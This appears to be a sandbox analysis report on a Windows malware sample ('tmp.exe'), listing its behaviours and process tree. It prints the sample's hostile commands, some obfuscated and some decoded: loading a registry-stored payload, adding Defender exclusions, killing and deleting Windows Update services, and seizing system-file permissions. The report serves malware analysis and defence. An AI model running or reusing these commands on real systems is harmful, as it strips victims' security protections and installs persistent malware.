Analysis
- max time kernel: 150s
- max time network: 139s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 19-01-2023 04:56
Behavioral task: behavioral1
- Sample: tmp.exe
- Resource: win7-20220812-en
General
- Target: tmp.exe
- Size: 4.9MB
- MD5: e2c876ff5b1f24b59d928e595234cdef
- SHA1: 82d06b09b2a8c514929aab293242d4796d4ee39f
- SHA256: e0622827883ae65735b2d662eb26e75aa70e1d90d5d37991a566a4ab9ff99244
- SHA512: 9562c0eb5485578c25f741beb5cb8206b2b4c7037e9a3bfa553ff833280c6788f730808e6fa93c7100486cd7877a33adddf8225944779638d304d1a42c66d7fd
- SSDEEP: 98304:ZXMmA6BgrvHq3uwG/9SopFAVrSkgAm2K2fklNvpJtpqCutXE:ZXb0TwmFzQ5PK2fklNvpJyCut
Malware Config
Signatures
Modifies security service (2 TTPs, 5 IoCs)
Process: reg.exe
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 (reg.exe)
Suspicious use of NtCreateProcessExOtherParentProcess (2 IoCs)
Processes: WerFault.exe, WerFault.exe
- PID 2812 (WerFault.exe) created PID 4404 (DllHost.exe)
- PID 4488 (WerFault.exe) created PID 3296 (DllHost.exe)
Suspicious use of NtCreateUserProcessOtherParentProcess (4 IoCs)
Processes: powershell.EXE, svchost.exe, powershell.EXE
- PID 3504 (powershell.EXE) created PID 604 (winlogon.exe)
- PID 4252 (svchost.exe) created PID 4404 (DllHost.exe)
- PID 4252 (svchost.exe) created PID 3296 (DllHost.exe)
- PID 380 (powershell.EXE) created PID 604 (winlogon.exe)
Drops file in Drivers directory (2 IoCs)
Processes: tmp.exe, MicrosoftEdgeUpdate.exe
- File opened for modification: C:\Windows\system32\drivers\etc\hosts (tmp.exe)
- File opened for modification: C:\Windows\system32\drivers\etc\hosts (MicrosoftEdgeUpdate.exe)
Executes dropped EXE (1 IoC)
- PID 4276 MicrosoftEdgeUpdate.exe
Possible privilege escalation attempt (4 IoCs)
- PID 2128 takeown.exe
- PID 1072 icacls.exe
- PID 5088 takeown.exe
- PID 3464 icacls.exe
Stops running service(s) (3 TTPs)
YARA matches (resource: rule):
- behavioral2/memory/988-132-0x0000000000140000-0x0000000000ACA000-memory.dmp: vmprotect
- C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe: vmprotect
- C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe: vmprotect
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Process: tmp.exe
- Key value queried: \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation (tmp.exe)
Modifies file permissions (1 TTP, 4 IoCs)
- PID 2128 takeown.exe
- PID 1072 icacls.exe
- PID 5088 takeown.exe
- PID 3464 icacls.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTP)
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
- Flow 25: ip-api.com
Drops file in System32 directory (18 IoCs)
Processes: powershell.EXE, svchost.exe, powershell.EXE, powershell.EXE, svchost.exe, OfficeClickToRun.exe, MicrosoftEdgeUpdate.exe, powershell.exe
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log (powershell.EXE)
- File opened for modification: C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx (svchost.exe)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.EXE)
- File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.EXE)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 (svchost.exe)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 (svchost.exe)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 (svchost.exe)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 (svchost.exe)
- File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log (powershell.EXE)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 (svchost.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.EXE)
- File opened for modification: C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx (svchost.exe)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml (OfficeClickToRun.exe)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868 (svchost.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MicrosoftEdgeUpdate.exe.log (MicrosoftEdgeUpdate.exe)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177 (svchost.exe)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE (svchost.exe)
Suspicious use of SetThreadContext (3 IoCs)
Processes: tmp.exe, powershell.EXE, powershell.EXE
- PID 988 (tmp.exe) set thread context of PID 4140 (conhost.exe)
- PID 3504 (powershell.EXE) set thread context of PID 4088 (dllhost.exe)
- PID 380 (powershell.EXE) set thread context of PID 748 (dllhost.exe)
Drops file in Program Files directory (3 IoCs)
Processes: powershell.exe, MicrosoftEdgeUpdate.exe
- File created: C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe (powershell.exe)
- File opened for modification: C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe (powershell.exe)
- File created: C:\Program Files\Google\Libs\WR64.sys (MicrosoftEdgeUpdate.exe)
Drops file in Windows directory (4 IoCs)
Process: conhost.exe
- File created: C:\Windows\Tasks\dialersvc64.job (conhost.exe)
- File opened for modification: C:\Windows\Tasks\dialersvc64.job (conhost.exe)
- File created: C:\Windows\Tasks\dialersvc32.job (conhost.exe)
- File opened for modification: C:\Windows\Tasks\dialersvc32.job (conhost.exe)
Launches sc.exe (10 IoCs)
Sc.exe is a Windows utility to control services on the system.
Processes (PID): 4320 sc.exe, 3616 sc.exe, 2188 sc.exe, 4092 sc.exe, 4772 sc.exe, 3304 sc.exe, 4520 sc.exe, 4512 sc.exe, 4424 sc.exe, 772 sc.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash (2 IoCs)
Processes: WerFault.exe, WerFault.exe
- PID 3404 WerFault.exe, target PID 3296 DllHost.exe
- PID 3304 WerFault.exe, target PID 4404 DllHost.exe
Checks processor information in registry (2 TTPs, 6 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: WerFault.exe, WerFault.exe
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (WerFault.exe)
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (WerFault.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (WerFault.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (WerFault.exe)
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (WerFault.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (WerFault.exe)
Enumerates system info in registry (2 TTPs, 4 IoCs)
Processes: WerFault.exe, WerFault.exe
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (WerFault.exe)
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (WerFault.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (WerFault.exe)
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (WerFault.exe)
Modifies data under HKEY_USERS (64 IoCs)
Processes: powershell.EXE, powershell.EXE, OfficeClickToRun.exe, powershell.EXE, powershell.exe, MicrosoftEdgeUpdate.exe
Modifies registry key (1 TTP, 18 IoCs)
Processes (PID): 3492 reg.exe, 3404 reg.exe, 1876 reg.exe, 2288 reg.exe, 4660 reg.exe, 1516 reg.exe, 1736 reg.exe, 4136 reg.exe, 4812 reg.exe, 3968 reg.exe, 3344 reg.exe, 2800 reg.exe, 3620 reg.exe, 4536 reg.exe, 1476 reg.exe, 1816 reg.exe, 3100 reg.exe, 4464 reg.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes: powershell.exe, tmp.exe, powershell.exe, powershell.EXE, dllhost.exe, powershell.EXE, WerFault.exe, WerFault.exe, svchost.exe
Suspicious behavior: GetForegroundWindowSpam (1 IoC)
- PID 2864 Explorer.EXE
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes: powershell.exe, powercfg.exe, powercfg.exe, powercfg.exe, powercfg.exe, tmp.exe, takeown.exe, powershell.exe, powershell.EXE
Suspicious use of SetWindowsHookEx (3 IoCs)
- PID 4812 Conhost.exe
- PID 3140 Conhost.exe
- PID 3100 Conhost.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes: tmp.exe, cmd.exe, cmd.exe, powershell.EXE
Processes (tree depth shown in brackets)
[1] C:\Windows\system32\lsass.exe
    Command line: C:\Windows\system32\lsass.exe
[1] C:\Windows\system32\winlogon.exe
    Command line: winlogon.exe
  [2] C:\Windows\system32\dwm.exe
      Command line: "dwm.exe"
  [2] C:\Windows\System32\dllhost.exe
      Command line: C:\Windows\System32\dllhost.exe /Processid:{26559d6a-db20-41ff-a827-50f937ea7091}
      - Suspicious behavior: EnumeratesProcesses
  [2] C:\Windows\SysWOW64\dllhost.exe
      Command line: C:\Windows\SysWOW64\dllhost.exe /Processid:{ac2a3d02-66ba-45a5-a2d1-18057f5fcde4}
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  [2] C:\Windows\system32\taskhostw.exe
      Command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
      Deobfuscated equivalent (format-string and backtick obfuscation resolved from the command line above): Set-Variable 6To ([type]'reflection.Assembly'); $Dlr4S = [type]'Microsoft.Win32.Registry'; $6To::Load((Get-Item Variable:Dlr4S).Value::LocalMachine.OpenSubKey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($null,$null)
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Drops file in System32 directory
      - Suspicious use of SetThreadContext
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
    [3] C:\Windows\System32\Conhost.exe
        Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
      Deobfuscated equivalent: same as the SysWOW64 powershell.EXE instance above (loads a .NET assembly stored in the registry value HKLM\SOFTWARE\dialerstager and invokes its entry point)
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Drops file in System32 directory
      - Suspicious use of SetThreadContext
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGkAawBxAHcAIwA+ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAGQAZwBlAFUAcABkAGEAdABlAHIAXABNAGkAYwByAG8AcwBvAGYAdABFAGQAZwBlAFUAcABkAGEAdABlAC4AZQB4AGUAJwAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwAgADwAIwBqAHoAYwBqACMAPgA="
      Decoded -EncodedCommand (base64 of UTF-16LE): <#ikqw#> Start-Process -FilePath 'C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe' -Verb RunAs <#jzcj#>
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
    [3] C:\Windows\System32\Conhost.exe
        Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        - Suspicious use of SetWindowsHookEx
    [3] C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe
        Command line: "C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe"
        - Drops file in Drivers directory
        - Executes dropped EXE
        - Drops file in System32 directory
        - Drops file in Program Files directory
        - Modifies data under HKEY_USERS
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAagBiAG8AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBhAGMAdwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBoAGYAdwAjAD4A"
          Decoded -EncodedCommand (base64 of UTF-16LE): <#kt#> Add-MpPreference <#bjbo#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#zacw#> -Force <#hfw#>
          - Drops file in System32 directory
          - Modifies data under HKEY_USERS
        [5] C:\Windows\System32\Conhost.exe
            Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            - Suspicious use of SetWindowsHookEx
      [4] C:\Windows\System32\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        [5] C:\Windows\System32\Conhost.exe
            Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            - Suspicious use of SetWindowsHookEx
        [5] C:\Windows\system32\sc.exe
            Command line: sc stop UsoSvc
            - Launches sc.exe
        [5] C:\Windows\system32\sc.exe
            Command line: sc stop WaaSMedicSvc
            - Launches sc.exe
        [5] C:\Windows\system32\sc.exe
            Command line: sc stop wuauserv
            - Launches sc.exe
        [5] C:\Windows\system32\sc.exe
            Command line: sc stop bits
            - Launches sc.exe
        [5] C:\Windows\system32\sc.exe
            Command line: sc stop dosvc
            - Launches sc.exe
        [5] C:\Windows\system32\reg.exe
            Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
            - Modifies registry key
        [5] C:\Windows\system32\reg.exe
            Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
            - Modifies registry key
        [5] C:\Windows\system32\reg.exe
            Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
            - Modifies registry key
        [5] C:\Windows\system32\reg.exe
            Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
            - Modifies registry key
        [5] C:\Windows\system32\reg.exe
            Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
            - Modifies registry key
        [5] C:\Windows\system32\takeown.exe
            Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\icacls.exe
            Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\reg.exe
            Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
            - Modifies registry key
        [5] C:\Windows\system32\reg.exe
            Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
            - Modifies registry key
        [5] C:\Windows\system32\reg.exe
            Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
            - Modifies registry key
        [5] C:\Windows\system32\reg.exe
            Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
            - Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe "luchktlmnebwz"4⤵
-
C:\Windows\system32\svchost.exe  [depth 1]
    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
-
C:\Windows\System32\svchost.exe  [depth 1]
    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
-
C:\Windows\System32\svchost.exe  [depth 1]
    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
-
C:\Windows\system32\svchost.exe  [depth 1]
    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
-
C:\Windows\System32\svchost.exe  [depth 1]
    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exe  [depth 1]
    C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
-
C:\Windows\system32\svchost.exe  [depth 1]
    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
-
C:\Windows\system32\sihost.exe  [depth 2]
    sihost.exe
-
C:\Windows\system32\svchost.exe  [depth 1]
    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
-
C:\Windows\System32\svchost.exe  [depth 1]
    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
-
C:\Windows\system32\svchost.exe  [depth 1]
    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
-
C:\Windows\system32\svchost.exe  [depth 1]
    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
-
C:\Windows\system32\svchost.exe  [depth 1]
    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
-
C:\Windows\System32\svchost.exe  [depth 1]
    C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
-
C:\Windows\System32\svchost.exe  [depth 1]
    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
-
C:\Windows\system32\svchost.exe  [depth 1]
    C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
-
C:\Windows\System32\svchost.exe  [depth 1]
    C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
-
C:\Windows\System32\svchost.exe  [depth 1]
    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
-
C:\Windows\system32\svchost.exe  [depth 1]
    C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
-
C:\Windows\System32\svchost.exe  [depth 1]
    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
-
C:\Windows\System32\svchost.exe  [depth 1]
    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
-
C:\Windows\system32\svchost.exe  [depth 1]
    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
-
C:\Windows\System32\spoolsv.exe  [depth 1]
    C:\Windows\System32\spoolsv.exe
-
C:\Windows\System32\svchost.exe  [depth 1]
    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
-
C:\Windows\System32\svchost.exe  [depth 1]
    C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
-
C:\Windows\system32\svchost.exe  [depth 1]
    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
-
C:\Windows\system32\svchost.exe  [depth 1]
    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
-
C:\Windows\system32\svchost.exe  [depth 1]
    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe  [depth 1]
    "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exe  [depth 1]
    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
- Drops file in System32 directory
-
C:\Windows\System32\svchost.exe  [depth 1]
    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
-
C:\Windows\system32\svchost.exe  [depth 1]
    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
-
C:\Windows\system32\svchost.exe  [depth 1]
    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
-
C:\Windows\system32\svchost.exe  [depth 1]
    C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
-
C:\Windows\Explorer.EXE  [depth 1]
    C:\Windows\Explorer.EXE
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe  [depth 2]
    "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
- Drops file in Drivers directory
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [depth 3]
